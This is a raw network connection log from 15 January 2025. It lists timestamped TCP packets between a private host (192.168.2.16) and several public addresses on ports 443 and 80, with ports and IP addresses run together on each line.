                                                                                                                                            Jan 15, 2025 19:14:48.568861961 CET49933443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:48.569319010 CET49933443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:48.569339037 CET44349933104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:49.771388054 CET4968080192.168.2.16192.229.211.108
                                                                                                                                            Jan 15, 2025 19:14:50.497184992 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:50.497287989 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:50.497386932 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:50.497617960 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:50.497653008 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.107609987 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.107942104 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.108002901 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.108366966 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.108664989 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.108727932 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.108794928 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.108880043 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.108910084 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.109014034 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.109044075 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.364077091 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.364279032 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.364375114 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.364438057 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.364546061 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.364598989 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.364614964 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.364734888 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.364792109 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.364994049 CET49934443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.365024090 CET44349934104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.368321896 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.368365049 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.368437052 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.368640900 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.368660927 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.428136110 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.428231001 CET44349936188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.428330898 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.428632975 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.428670883 CET44349936188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.866041899 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.866332054 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.866370916 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.867558956 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.867937088 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.868068933 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.868076086 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.868112087 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.910399914 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:51.915743113 CET44349936188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.915994883 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.916062117 CET44349936188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.916944981 CET44349936188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.917016983 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.917902946 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.917942047 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.917994022 CET44349936188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.917996883 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.918124914 CET49936443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.918258905 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.918337107 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.918421984 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.918596029 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:51.918628931 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.003396988 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.003556967 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.003637075 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:52.003918886 CET49935443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:52.003940105 CET44349935104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.429979086 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.430324078 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:52.430352926 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.431405067 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.431519985 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:52.432404995 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:52.432499886 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.432585001 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:52.475323915 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.485392094 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:52.485399008 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:52.533607960 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.110703945 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.110959053 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.111162901 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.117299080 CET49937443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.117342949 CET44349937188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.204132080 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.204226971 CET44349940188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.204315901 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.204605103 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.204626083 CET44349940188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.715241909 CET44349940188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.715509892 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.715574980 CET44349940188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.717032909 CET44349940188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.717118025 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.717400074 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.717401028 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.717441082 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.717498064 CET44349940188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.717621088 CET49940443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.717710018 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.717803001 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.717890978 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.718071938 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:53.718107939 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.203130960 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.203413010 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:54.203475952 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.205368042 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.205454111 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:54.205760956 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:54.205847025 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.205929995 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:54.251332045 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.257491112 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:54.257550955 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.305404902 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:54.852509022 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.852787971 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.852972031 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:54.853199005 CET49941443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:54.853240013 CET44349941188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.927428007 CET49678443192.168.2.1620.189.173.10
                                                                                                                                            Jan 15, 2025 19:14:59.375426054 CET4968080192.168.2.16192.229.211.108
                                                                                                                                            Jan 15, 2025 19:15:15.374890089 CET4969680192.168.2.162.16.100.168
                                                                                                                                            Jan 15, 2025 19:15:15.375291109 CET4969780192.168.2.162.16.100.168
                                                                                                                                            Jan 15, 2025 19:15:15.380032063 CET80496962.16.100.168192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:15.380177021 CET4969680192.168.2.162.16.100.168
                                                                                                                                            Jan 15, 2025 19:15:15.380357981 CET80496972.16.100.168192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:15.380573034 CET4969780192.168.2.162.16.100.168
                                                                                                                                            Jan 15, 2025 19:15:26.418782949 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:26.418884993 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:26.418987036 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:26.419217110 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:26.419250011 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:26.915564060 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:26.916080952 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:26.916147947 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:26.916908979 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:26.917588949 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:26.917589903 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:26.917632103 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:26.917669058 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:26.917704105 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:26.963742971 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:27.073359966 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:27.073612928 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:27.074011087 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:27.074140072 CET49981443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:15:27.074179888 CET4434998135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:34.178023100 CET49983443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:15:34.178056002 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:34.182593107 CET49983443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:15:34.182593107 CET49983443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:15:34.182621956 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:34.813183069 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:34.813450098 CET49983443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:15:34.813463926 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:34.813916922 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:34.819072962 CET49983443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:15:34.819153070 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:34.866260052 CET49983443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:15:44.719623089 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:44.719774008 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:44.719857931 CET49983443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:15:45.122711897 CET49983443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:15:45.122740030 CET44349983142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:05.972862005 CET4969980192.168.2.162.23.77.188
                                                                                                                                            Jan 15, 2025 19:16:05.978115082 CET80496992.23.77.188192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:05.978195906 CET4969980192.168.2.162.23.77.188
                                                                                                                                            Jan 15, 2025 19:16:21.015439987 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.015471935 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.015557051 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.015743971 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.015755892 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.035177946 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.035245895 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.035346985 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.035562038 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.035593033 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.533252001 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.533344030 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.533443928 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.533823013 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.533853054 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.597062111 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.597405910 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.597438097 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.599092007 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.599163055 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.600148916 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.600233078 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.600334883 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.600353003 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.642760992 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.716367960 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.716609955 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.716644049 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.720223904 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.720300913 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.721138000 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.721286058 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.721293926 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.721312046 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.769751072 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.769783974 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.782644987 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.782748938 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.782807112 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.783291101 CET50030443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.783339024 CET4435003035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.793433905 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.793459892 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.793523073 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.793756962 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:21.793771029 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.817770004 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.823122025 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.823334932 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.823401928 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.823767900 CET50029443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.823791981 CET4435002934.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.834439039 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.834481955 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.834548950 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.834717989 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:21.834728956 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.055042982 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.055326939 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.055336952 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.055708885 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.056032896 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.056093931 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.056332111 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.056420088 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.056449890 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.259675026 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.259932995 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.259964943 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.261408091 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.261476994 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.261830091 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.261909962 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.261998892 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.262007952 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.310741901 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.311803102 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.312028885 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.312078953 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.312434912 CET50035443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.312453032 CET4435003535.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.396184921 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.396277905 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.396323919 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.396918058 CET50036443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.396936893 CET4435003635.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.423208952 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.429131985 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:22.429178953 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.431140900 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.431209087 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:22.431580067 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:22.431657076 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.431752920 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:22.431761026 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.472984076 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:22.535983086 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.536092997 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.536156893 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:22.592010021 CET50037443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:16:22.592050076 CET4435003734.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.601562977 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.601624012 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:22.601686954 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.602214098 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:22.602235079 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.059426069 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.059894085 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.059959888 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.060316086 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.060640097 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.060717106 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.060765028 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.060832024 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.060877085 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.267474890 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.267599106 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.267699003 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.268166065 CET50039443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.268197060 CET4435003935.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.273273945 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.273308039 CET4435004035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.273400068 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.273664951 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.273682117 CET4435004035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.730057001 CET4435004035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.730880022 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.730901003 CET4435004035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.731264114 CET4435004035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.731848001 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.731848001 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.731914997 CET4435004035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.775337934 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.867758036 CET4435004035.190.10.96192.168.2.16
